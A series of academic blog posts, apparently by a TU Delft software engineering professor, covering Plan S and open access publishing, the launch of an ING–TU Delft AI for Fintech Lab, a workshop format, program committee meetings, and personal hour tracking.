Collecting the data takes took me around a minute per paper. You are cordially invited to repeat this exercise for your own favorite conference or journal (TSE, EMSE, JSS, MSR, ICSME, RE, MODELS, …), and I will do my best to reflect your data in this post. If you’re a conference organizer, the safest thing to do is survey authors about their funding, enquiring about Coalition S based funding explicitly.

There is a another point to be made that required little data gathering.

The 14% figure relates to impact on the conference. Individual researchers can be affected much more. Our group at TU Delft, for example, has been very successful in attracting substantial funding both from the EU and from the Dutch NWO. As a consequence, for me personally, half of my publications will be affected. For some new PhD students starting in my group funded on such projects all publications will be affected.

A Call for Action

Clearly, the impact of Plan S can be substantial, on individual researchers as well as on conferences and journals.

This calls for action.

ACM, as one of the leading publishers in computer science, shared an update on their Plan S progress in their July 2019 news letter. It states:

It is worth noting that ACM has been working with various consortia in the US, Europe, and elsewhere on a framework for transitioning the traditional ACM Digital Library licensing (subscription) model to a Gold Open Access model utilizing an innovative “transformative agreement” model. More details will be announced later in 2019 as the first of these Agreements are executed; once these are in place, all ACM Publications will comply with the majority of Plan S requirements.

This is good news, and certainly not a simple undertaking. I sincerely hope that ACM will be able to meet not just the majority, but all requirements, and for all conferences and journals. This essentially implies a change of business model for the ACM Digital Library, from a subscription based to an author-(institution)-pays model. This in itself will not be easy, and is further complicated by several constraints and strong criteria imposed by Plan S, for example concerning cost transparency. The key challenge will be to convince Coalition S that these criteria are indeed met.

The ACM Special Interest Group on Programming Languages, SIGPLAN, meanwhile, sets an example on how to progress within the current setting. The research papers of three of its key conferences are published as part of the Proceedings of the ACM in Programming Languages. This is a Gold Open Access journal in which different volumes are devoted to different conferences. The POPL, OOPSLA, and ICFP conferences have adopted this model, and hence are fully open access. To quote the Inaugural Editorial Message by Philip Wadler:

PACMPL is a Gold Open Access journal. It will be archived in ACM’s Digital Library, but no membership or fee is required for access. Gold Open Access has been made possible by generous funding through ACM SIGPLAN, which will cover all open access costs in the event authors cannot. Authors who can cover the costs may do so by paying an Article Processing Charge (APC). PACMPL, SIGPLAN, and ACM Headquarters are committed to exploring routes to making Gold Open Access publication both affordable and sustainable.

The ACM SIG for Software Engineering, SIGSOFT, so far has not taken action along these lines. Nevertheless, this is simple to do, especially since SIGPLAN has laid out all the ground work.

Furthermore, last year, we as ACM SIGSOFT members elected Tom Zimmermann as our chair. In his statement for the elections he wrote:

We should make gold open access a priority for SIGSOFT

He also provided details on how to achieve this, mostly along the lines of SIGPLAN. By electing him, we as ACM SIGSOFT members gave him the mandate to carry this out. This will not be easy to do, but calls for all support from the full software engineering research community to help the ACM SIGSOFT leadership with this important mission.

The other main non-profit society publisher in software engineering is the IEEE. IEEE publishes various conferences and journals in software engineering on its own, such as ICSME, MODELS, RE and ICST. Furthermore, several major conferences are co-sponsored by IEEE and ACM together, such as ICSE and ASE.

Unfortunately, I have not been able to find on line information about IEEE’s vision on Plan S, and its impact on the conference proceedings published by the IEEE. This makes it very unclear what, from 2021 onwards, the publication options are for many software engineering conferences.

Nevertheless, it is my hope that IEEE will embrace Plan S, and move to open access conference proceedings, as many other society publishers have done.

This, then, will open the floor to joint open access publications, for example through the new fully open access “Proceedings of the ACM in Software Engineering”.


Version History

  • Version 0.4, 20-08-2019. First public version.
  • Version 0.5, 25-08-2019. Major update to reflect that self-archiving route can aslo be used to meet Plan S requirements.
  • Version 0.6, 26-08-2019. Small updates about CC BY options.
  • Version 0.7, 28-08-2019. Major update about repository route in combination with CC BY and hybrid open access, and transformative arrangements.
  • Version 0.8, 30-08-2019. Add links to IEEE open access faq/
  • Version 0.9, 04-09-2019. Small typos fixed

Note: IANAL — use this information at your own risk.

Acknowledgements: Thanks to Diomidis Spinellis, Simon Bains, Jeroen Bosman, Bianca Kramer, and Jeroen Sondervan for feedback on an earlier drafts on this post.

License: Copyright (c) Arie van Deursen, 2019. Licensed under CC BY.

Slide Deck

Slides

Launching AFL: The AI for Fintech Lab

AFL Announcement

I am extremely proud that yesterday we publicly announced the AI for Fintech Lab — AFL.

The AI for Fintech Lab (AFL) is a collaboration between ING and Delft University of Technology. The mission of AFL is to perform world-class research at the intersection of Artificial Intelligence, Data Analytics, and Software Analytics in the context of FinTech.

With 36 million customers, activities in 42 countries, and a total of 50,000 employees of which 15,000 work in IT, software and data technology is at the heart of ING’s business and operations. In this context, the AFL seeks to develop new AI-driven theories, methods, and tools in large scale data and software analytics.

Over the next five years, ten PhD researchers will work in the lab. Research topics will include human-centered software analytics, autonomous software engineering, analytics delivery, data integration, and continuous experimentation.

AFL will be bi-located at the ING campus Amsterdam and the TU Delft campus in Delft, bringing together students, engineers, researchers, professors, and entrepreneurs from both organizations at both locations.

ICAI Logo

AFL will join the Innovation Center for Artificial Intelligence (ICAI) as one of its labs. ICAI is a virtual organization consisting of a series of labs of similar size (over five PhD researchers each) funded directly by industry. AFL will benefit from the experience and expertise of other academic and industrial ICAI partners, such as Qualcom, Bosch, Ahold Delhaize, the Dutch National Police, the University of Amsterdam, and Utrecht University.

As scientific director of the brand new AI-for-Fintech Lab, I look forward to this exciting, long term collaboration between ING and TU Delft.

And, yes, we are hiring!

If you’re interested in bringing together industry and academia, if you’re not afraid to work at two locations, and if you have a strong background in computer science (software engineering, artificial intelligence, data science), you are welcome to apply as a PhD student! Details about the application process will follow soon.

Besides PhD students, we will have related positions for postdoctoral researchers and scientific programmers. And of course, TU Delft BSc students and MSc students are welcome to conduct their research projects within the AI for Fintech Lab!

I look forward to a great collaboration spanning at least five years, with exciting new results in the areas of AI, data science, and software engineering!

ING, AFL, and TU Delft logos

Writers and Collaborators Workshops

In September this year we will organize a Lorentz workshop in the area of software analytics and big software. Lorentz worskhops take place in the Lorentz Center in Leiden, and are somewhat similar to Dagstuhl seminars common in computer science: A small group, a week long retreat, and a focus on interaction and collaboration.

Workshop poster

To make this interaction happen, we will experiment with “writer’s and collaborator’s workshops”, inspired by Writer’s Workshops for design patterns.

The workshops we have in mind are short (1-2 hour) sessions, in which a small group of participants (the “discussants”) study one or more papers (proposed by the “author”) in depth.

The primary objective of the session is to provide feedback on the paper to the author. This feedback can relate to any aspect of the paper, such as the experimental setup, the related work, the precise objective, future work that can be carried out to build upon these results, etc.

Besides that, the discussion of each paper serves to explore possible (future) collaborations between any of the participants. Thus, discussants can bring in their own related work, and explore how joining forces can help to further advance the paper’s key results.

The set up of the workshops draws inspiration from Writer’s Workshops commonly used in the design patterns community, which in turn were inspired by workshops int he creative literature community. Pattern workshops have been used to review, evaluate, and improve pattern descriptions. At the same time, the process is akin to a peer review process, except that the objective is not paper selection, but in depth discussion between authors and participants about the key message of a paper.

The specific format we propose is as follows.

The preparation phase aims to match authors and discussants. Using a conference paper management system like EasyChair, the steps include:

  1. Authors submit the paper they would like to have discussed. This can be a paper currently under review (e.g., their most recent ICSE submissions), a draft version of a paper they would like to submit, or an already published paper they would like to expand (for example for a journal submission).

  2. All workshop participants can see all papers, and place “bids” on papers they would be particularly interested in studying in advance.

  3. Papers and participants are grouped into coherent units of 3-4 papers and around 10 participants each.

  4. Each paper to be discussed gets assigned at least three discussants, based on the groups and bids.

  5. Discussants study the papers assigned in advance, and compile a short summary of the paper and its main strenghts and points for improvement.

The actual workshops will take 1-2 hours, has up to 10 participants, and includes the discussion of 2-3 papers using 30-45 minutes per paper. We propose the following format:

  1. For each workshop, we assign one moderator to steer the process.

  2. One of the discussants is assigned to summarize the paper in around 5 minutes, and explain it to the participants.

  3. Each discussant explains what he or she particularly liked about the paper

  4. Each discussant identifies opportunities for possible improvements to the paper.

  5. Workshop participants who did not review the paper themselves offer their perspectives on the discussion, including areas of further work.

  6. After this, the author him or herself can step in, and respond to the various points raised.

  7. As the discussion concludes, the moderator provides a summary of the main findings of the discussion of this paper.

  8. The process is repeated for the next paper, rotating the author, moderator, and discussant roles.

If you have ever attended a physical PC meeting, you will recognize our attempt to keep some of the good parts of a PC meeting, without the need to make any form of “acceptance” decision.

Since several of the lessons learned during such a session will transcend the individual papers discussed, we will also use plenary sessions in which each of the moderators can summarize the main findings of their workshops, and share them with everyone.

As also emphasized by the patterns community, this format requires a safe setting with participants who trust each other. In particular:

  • Papers discussed are confidential: Authors need not be scared that participants “steal” their ideas;
  • Feedback is directed at the work rather than the author, preserving the dignity of the author.

Clearly, such a “writers and collaborators workshop” does require work from the participants, both in terms of following the protocol and in preparing the discussions. So we will have to see if it really works or whether some adjustments are necessary.

Yet this format does provide an excellent way to truly engage with each other’s research, and we look forward to the improved research results and future collaborations that will emerge from this.

If you have any exeprience with formats like this, please let me know!


P.S. We still have some places available in the workshop, so contact me if you are interested in participating.

The Battle for Affordable Open Access

Last week, Elsevier cut off thousands of scientists in Germany and Sweden from reading its recent journal articles, when negotiations over the cost of a nationwide open-access agreement broke down.

In these negotiations, universities are trying to change academic publishing, while publishers are defending the status quo. If you are an academic, you need to decide how to respond to this conflict:

  1. If you don’t change your own behavior, you are chosing Elsevier’s side, helping them maintain the status quo.
  2. If you are willing to change, you can help the universities. The simplest thing to do is to rigorously self-archive all your publications.

The key reason academic publishing needs to change is that academic publishers, including Elsevier, realize profit margins of 30-40%.

Euro bills

To put this number in perspective, consider my university, TU Delft. Our library spends €4-5 million each year on (journal) subscriptions. 30-40% of this amount, €1-2 million each year, ends up directly in the pockets of the shareholders of commercial publishers.

This is unacceptable. My university needs this money: To handle the immense work load coming with ever increasing student numbers, and to meet the research demands of society. A university cannot afford to waste money by just handing it over to publishers.

Universities across Europe have started to realize this. The Dutch, German, French, and Swedish universities have negotiated at the national level with publishers such as Springer Nature, Wiley, Taylor & Francis, Oxford University Press, and Elsevier (the largest publisher). In many cases deals have been made, with more and more options for open access publishing, at prices that were acceptable to the universities.

However, in several cases no deals have been made. The Dutch universities could not agree with the Royal Society of Chemistry Publishing, the French failed with Springer Nature, and now Germany and Sweden could not come to agreement with Elsevier. A common point of contention is that universities are only willing to pay for journal subscriptions if their employees can publish open access without additional article processing charges — a demand that directly challenges the current business model in academic publishing.

The negotiations are not over yet. Both in terms of open access availability and in terms of price publishers are far from where the universities want them to be. And if the universities would not negotiate themselves, tax payers and governments could simply force them, by putting a cap on the amount of money universities are allowed to spend on journal subscriptions.

Universities are likely to join forces, also across nations. They will determine maximum prices, and will not be willing to make exceptions. The negotiations will be brutal, as the publishers have much to loose and much to fight for.

In all these negotiations it is crucial that universities take back ownership of what they produce. Every single researcher can contribute, simply by making all of their own papers available on their institutional (pure.tudelft.nl for my university) or subject repositories (e.g., arxiv.org). This helps in two ways:

  • It helps researchers cut off (Germans and Swedes as we speak) from publishers in case negotiations fail.
  • It reduces the publishers’ power in future negotiations as the negative effects of cancellations have been reduced.

This seems like a simple thing to do, and it is: It should not take an average researcher more than 10 minutes to post a paper on a public repository.

Nevertheless, during my two years as department head I have seen many researchers who fail to see the need or take the time to upload their papers. I have begged, prayed, and pushed, wrote a green open access FAQ to address any legal concerns researchers might have, and wrote a step-by-step guide on how to upload a paper.

Open Access Adoption at TU Delft

On top of that, my university, like many others, have made it compulsory for its employees to upload their papers to the institutional repository (this is not surprising since TU Delft plays a leading role in the Dutch negotiations between universities and publishers). Furthermore both national (NWO) and European (H2020, Horizon Europe) funding agencies insist on open access publications.

Despite all this, my department barely meets the university ambition of having 60% of its 2018 publications available as (green or gold) open access. To the credit of my departmental employees, however, they do better than many other departments. Also pre-print links uploaded to conference sites have typically been less than 60%, suggesting that the culture of self-archiving in computer science leaves much to be desired.

If anything, the recent cut off by Elsevier in Sweden and Germany emphasizes the need for self-archiving.

If you’re too busy to self-archive, you are helping Elsevier getting rich from public money.

If you do self-archive, you help your university explain to publishers that their services are only needed when they bring true value to the publishing process at an affordable price.


© Arie van Deursen, 2018. Licensed under CC BY-SA 4.0.

Euro image credit: pixabay, CC0 Creative Commons.

My Last Program Committee Meeting?

This month, I participated in what may very well have been my last physical program committee (PC) meeting, for ESEC/FSE 2018. In 2017, top software engineering conferences like ICSE, ESEC/FSE, ASE and ISSTA (still) had physical PC meetings. In 2019, these four will all switch to on line PC meetings instead.

I participated in almost 20 of such meetings, and chaired one in 2017. Here is what I learned and observed, starting with the positives:

  1. As an author, I learned the importance of helping reviewers to quickly see and concisely formulate the key contributions in a way that is understandable to the full pc.

  2. As a reviewer I learned to study papers so well that I could confidently discuss them in front of 40 (randomly critical) PC members.

  3. During the meetings, I witnessed how reviewers can passionately defend a paper as long as they clearly see its value and contributions, and how they will kill a paper if it has an irreparable flaw.

  4. I started to understand reviewing as a social process in which reviewers need to be encouraged to change their minds as more information unfolds, in order to arrive at consensus.

  5. I learned phrases reviewers use to permit them to change their minds, such as “on the fence”, “lukewarm”, “not embarrassing”, “my +1 can also be read as a -1”, “I am not an expert but”, etc. Essential idioms to reach consensus.

  6. I witnessed how paper discussions can go beyond the individual paper, and trigger broad and important debate about the nature of the arguments used to accept or reject a paper (e.g. on evaluation methods used, impact, data availability, etc)

  7. I saw how overhearing discussions of papers reviewed by others can be useful, both to add insight (e.g. additional related work) and to challenge the (nature of the) arguments used.

  8. I felt, when I was PC co-chair, the pressure from 40 PC members challenging the consistency of any decision we made on paper acceptance. In terms of impact on the reviewing process, this may well be the most important benefit of a physical PC meeting.

  9. I experienced how PC meetings are a great way to build a trusted community and make friends for life. I deeply respected the rigor and well articulated concerns of many PC members. And nothing bonds like spending two full days in a small meeting room with many people and insufficient oxygen.

I also witnessed some of the problems:

  1. My biggest struggle was the incredible inefficiency of PC meetings. They take 1-2 days from 8am-6pm, you’re present at discussions of up to 100 papers discussed in 5-10 minutes each, yet participate in often less than 10 papers, in some cases just one or two.

  2. I had to travel long distances just for meetings. Co-located meetings (e.g. the FSE meeting is typically immediately after ICSE) reduce the footprint, but I have crossed the Atlantic multiple times just for a two day PC meeting.

  3. My family paid a price for my absence caused by almost 20 PC meetings. I have missed multiple family birthdays.

  4. The financial burden on the conference (meeting room + 40 x dinner and 80 lunches, €5000) and each PC member (travel and 2-3 hotel nights, adding up easily to €750 per person paid by the PC members) is substantial.

  5. I saw how vocal pc members can dominate discussions, yielding less opportunity for the more timid pc members who need more time to think before they dare to speak.

  6. I hardly attended a PC meeting in which not at least a few PC members eventually had to cancel their trip, and at best participated via Skype. This gives papers reviewed by these PC members a different treatment. As PC chair for ESEC/FSE we had five PC members who could not make it, all for valid (personal, painful) reasons. I myself had to cancel one PC meeting a week before the meeting, when one of my children had serious health problems.

  7. Insisting on a physical PC meeeting limits the choice of PC members: When inviting 40 PC members for ESEC/FSE 2017, we had 20 candidates who declined our invitation as they could not commit a year in advance to attending a PC meeting (in Buenos Aires).

Taking the pros and cons together, I have come to believe that the benefits do not outweigh the high costs. It must be possible to organize an on line PC meeting with special actions to keep the good parts (quality control, consistent decisions, overhearing/inspecting each others reviews, …).

I look forward to learning from ICSE, ESEC FSE, ISSTA and ASE experiences in 2019 and beyond about best practices to apply for organizing a successful on line PC meeting.

In principle, ICSE will have on line PC meetings in 2019, 2020, and 2021, after which the steering committee will evaluate the pros and cons.

As ICSE 2021 program co-chairs, Tao Xie and I are very happy about this, and we will do our best to turn the ICSE 2021 on line PC meeting into a great success, for the authors, the PC members, and the ICSE community. Any suggestions on how to achieve this are greatly appreciated.

T-Shirt saying "Last PC Meeting Ever?"

Christian Bird realized the ESEC/FSE 2018 PC meeting may be our last, and realized this nostalgic moment deserved a T-shirt of its own. Thanks!!


(c) Arie van Deursen, June 2018.

Academic Hour Tracking: Why, When, How

One tool I find indispensable in managing my time is keeping track of how I spend my working hours. During the past years, I have tracked my time at the hour level, split across around 20 tasks, grouped into three high level categories corresponding to my main responsibilities (management, research, teaching).

Keeping track of hours has helped me as follows:

  1. Formulating a strategy: Thinking in terms of hours spent per week, forces me to formulate a bigger strategy on how I wish to spend my time: I want to work around 40h per week, divided evenly over management, research, and teaching.

  2. Identifying time sinks: Activities that take more time than expected become visible. This need not be a problem per se, but making time sinks explicit helps me to adjust the planning of my other activities.

  3. Keeping commitments: Seeing my time spent helps me understand if I keep my commitments. For example, my hour sheets will tell me when I spent substantially less time on one PhD student compared to another, so that I can take action.

  4. Rewarding myself: When I’m in a week with, e.g., clearly too much management, I have a good reason to cut down organizational duties the next week, and engage in some research instead (without feeling “guilty” about this).

  5. Planning my work: My sheets of the previous year help me in planning the current year.

  6. Organizational change: Knowing how much time activities take gives me a great starting point for an informed debate about organizational change — within the department, university, with my boss, or in my research community.

  7. Slowing down: My sheets tell me when there is a busy period, and that I need to slow down.

  8. Regaining control: Stress is a factor in (academic) life, and I’m not immune to it. Regaining control over my time by seeing what I do is a stress management tool I can’t live without.

  9. Yearly appraisal: In my annual performance review with my superiors I can indicate with confidence how much effort my various responsibilities required.

My approach to keeping hours is simple and low tech: I just use a spreadsheet:

  • It has columns for my activity types (around 20) grouped together into three high level categories.

  • It has one row for each day

  • A cell contains the number of hours spent on an activity on a given day. I always use round numbers (full hours), but I know others who track at the level of 15 minutes.

  • The top row aggregates the time and percentages of the activities: I can, e.g., see that I spent 10% of my time on course X, and 5% of my time reviewing for conference Y.

  • I have aggregating columns giving the time spent that day, the total time spent the last week, and the average time spent per week over the full measuring period.

I typically use a spreadsheet for half a year, and then start a fresh one with adjusted columns. Whenever activities take more than 10%, I try to split them into different smaller ones, to better see what is taking so much time.

The bigger categories can sometimes raise interesting questions: Is reviewing research? Is project acquisition and proposal writing research? Is supervising a master student research? But whatever the categories, these activities take time, and monitoring them makes explicit how much.

I usually fill in my spreadsheet at the end of the day or the end of the week. I use my memory, calendar, and sometimes my email archives to remember what I did. For my purposes, this is sufficiently precise. Filling in the sheet takes me less than 15 minutes — and while filling it in I am forced to reflect on how I spend my time.

If you’re interested in following a similar approach, I’ve created a template empty spreadsheet for download. An alternative is to use the BubbleTimer app and service (which Jonathan Aldrich uses).

If you’re struggling with your time try out tracking it: it has helped me, and hopefully it will help you too!


(c) Arie van Deursen, April 2018. CC-BY-SA-4.0.


horloge strassbourg

Image: Astronomical clock, Strasbourg. Credit: Pascal Subtil, Flickr, CC-BY-2.0